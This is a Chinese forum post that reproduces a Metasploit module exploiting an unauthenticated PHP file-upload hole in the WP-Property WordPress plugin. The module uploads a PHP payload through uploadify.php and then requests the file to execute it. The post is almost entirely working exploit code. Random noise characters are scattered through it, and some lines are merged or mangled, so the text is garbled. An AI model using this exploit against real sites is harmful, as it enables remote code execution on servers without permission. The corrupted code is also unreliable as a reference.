WordPress WP-Property PHP 文件上传漏洞
6 U ?# _- T! w& t7 B. G3 O% }
6 N2 Y ?: e* I1 x ## # This file is part of the Metasploit Framework and may be subject to
* J7 U# `+ B1 J- a) J* L; F% S: O
( L. e; ~( P+ ~% f" a. {6 n# redistribution and commercial restrictions. Please see the Metasploit
) v G1 {* T8 @+ h) y
7 d/ v+ r b( T8 u& z6 Q1 D# Framework web site for more information on licensing and terms of use.
$ G; b$ V9 C! `3 O" S
8 a) U! ~$ a4 }% |# http://metasploit.com/framework/ ##
* ?& u8 M; I1 K7 y, ^0 y( F. i
$ s: W; B1 @8 y7 L+ ^( P; E1 t7 F" E
2 p9 z! K9 F4 p% r7 e1 ^
6 N$ x3 J% F* Q 1 m6 A6 ^7 A- u5 t7 f1 l: {4 K
/ S- T# D/ h* W/ E7 O/ q; Wrequire 'msf/core'
5 t. Q& ^4 G0 rrequire 'msf/core/exploit/php_exe'4 `( [2 z/ U& b$ ]8 Q
* n8 \2 ~6 B) d# o7 y wclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',: F# b- c9 b: y' j5 j0 y. d; k0 E, g; E
'Description' => %q{
4 {$ y/ J9 D1 m( dThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>0 B& z8 A, k. C& Z
[$ i; |+ e! d3 B1 n j5 ~( C
'Sammy FORGIT', # initial discovery n) K& A5 J' V0 u* ~
'James Fitts <fitts.james[at]gmail.com>' # metasploit module# P4 U2 x, a* G5 E8 y
],
9 L) ?. N0 I- u! ^" S, x, I'License' => MSF_LICENSE,
% f& K! v4 a) V( I'References' =>
2 W p2 Z; D1 G. c @! ?% j[
' ~+ {1 i5 D0 S+ Z% d \. {[ 'OSVDB', '82656' ],4 C c; g0 \$ k& r
[ 'BID', '53787' ],
7 `& G2 B# V3 g5 z& b: ]0 i[ 'EDB', '18987'],$ T8 J" U) ?& w h8 x
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
4 x6 D4 i8 A( |1 C; R],2 c2 t- X2 f! \( c
'Payload' =>
3 m1 r' R1 O- q# ?# _1 \{
- r0 |& Q/ f$ p+ M% c'BadChars' => "\x00",2 r8 C6 l" o5 d
},
* U F/ Q( n. e; J'Platform' => 'php',* d4 P( S6 ~$ D# j% ~
'Arch' => ARCH_PHP,
4 |' f) V( i7 M2 G( N'Targets' =>" u1 B3 x( T8 ~8 T
[ J5 u0 u' t1 J" @' Q
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],; J3 M/ m$ L" }" \& G9 H
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
% @1 c- g/ {. A; u],
' \. m/ W- ]. @* R'DefaultTarget' => 0,
& p. q9 K- ]& l% w& o) E'DisclosureDate' => 'Mar 26 2012'))
. I5 r4 G+ E) E+ g7 O
, C% A0 K; e( g: `0 t: E, u) @register_options(- W9 t( K# r0 P. C" m4 _% }
[5 ^ _/ T$ s7 @5 [0 ]
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
* q7 y- ~: M3 w], self.class)
$ t3 d6 N6 ^8 I2 `3 I# X- G; Yend
) b1 V* x2 v4 l
3 P; F- I5 k# k6 U. X! ?5 f$ {5 {( Mdef check
X( G4 R6 S0 H: Yuri = target_uri.path
* |( Z! ~( B+ V+ t! w" v- Ouri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',) a4 w/ e5 c+ p
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"0 S; x; d- V( _" B; E/ _
})+ m) O, z) f9 q
. T0 Z C. q$ z! \
if not res or res.code != 200
w1 w; M" `! D1 l* ^7 G/ Creturn Exploit::CheckCode::Unknown9 |. {7 B8 D( O" G9 {
end3 o9 t" c( C8 L# \* y5 h
8 v" K" b& H6 `7 ireturn Exploit::CheckCode::Appears& i6 `! N" C* w( N3 O
end! w% A# j2 b- L) A" D) W* J
+ q* u- D! p' l) I$ L2 ~! P" Y$ Xdef exploit6 H! s; M7 c; d. ?1 s) g+ }
uri = target_uri.path% x4 q9 T5 T6 C) o, C. m6 a4 a
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
% s4 G3 L8 u5 V- R" Y4 U
% A" i5 f! V8 U+ ]data = Rex::MIME::Message.new$ `$ N# C6 y/ Q* P* v
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
1 c2 W' J, M/ W: A' r& E/ `9 qdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")8 b+ E' Y' @" N" k: _8 |/ c2 G
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')) h0 }7 {6 M o: z* I( M
- r/ x8 ]# `, G9 ]* E y
print_status("#{peer} - Uploading payload #{@payload_name}")
% X+ q$ `) W0 L# W% B; f8 Fres = send_request_cgi({2 E# v: D v" u) ?
'method' => 'POST',2 s$ b9 T! r. `" J. |) a4 V
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",% Q( J+ \5 W1 B& X. \$ n
'ctype' => "multipart/form-data; boundary=#{data.bound}",; f3 w4 s& h4 p4 }" s
'data' => post_data/ @5 S- r6 J4 L% t, K
})
( `1 v6 Q5 A9 L( i- |: l# h5 s o/ Y5 P& m+ K6 n1 I
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
) d4 u3 l9 ? d& m* |, X+ Sfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
# o0 T# B) e( H4 l) ?( U& send$ I: t1 ?& S% C' Y1 @
) _4 N) r) V* `upload_uri = res.body; q. v! Q9 j5 F% R U& m P
' c( E z) j9 w) b8 k/ `
print_status("#{peer} - Executing payload #{@payload_name}")
/ R) U% a/ @! k1 B0 b( X7 yres = send_request_raw({" Z% P$ n: Y* W
'uri' => upload_uri,
" o4 V7 z. \# S# Z1 n* V'method' => 'GET'
9 H- f5 s6 v; o' n- T( E})* t8 h7 L. W- N& {. t
end$ g% @- k* E' w' [' g) m
end
" t) l+ \/ E0 M% T$ X9 k/ @
0 R& s" [8 C. F$ R2 H* k3 R2 s不要问我这写的是什么 怎么利用 我是说msf.
3 m* f1 f7 _) ]8 V0 @
6 {9 B5 I4 M6 K- w |
发表于 2013-1-4 19:51:30
收藏
支持
反对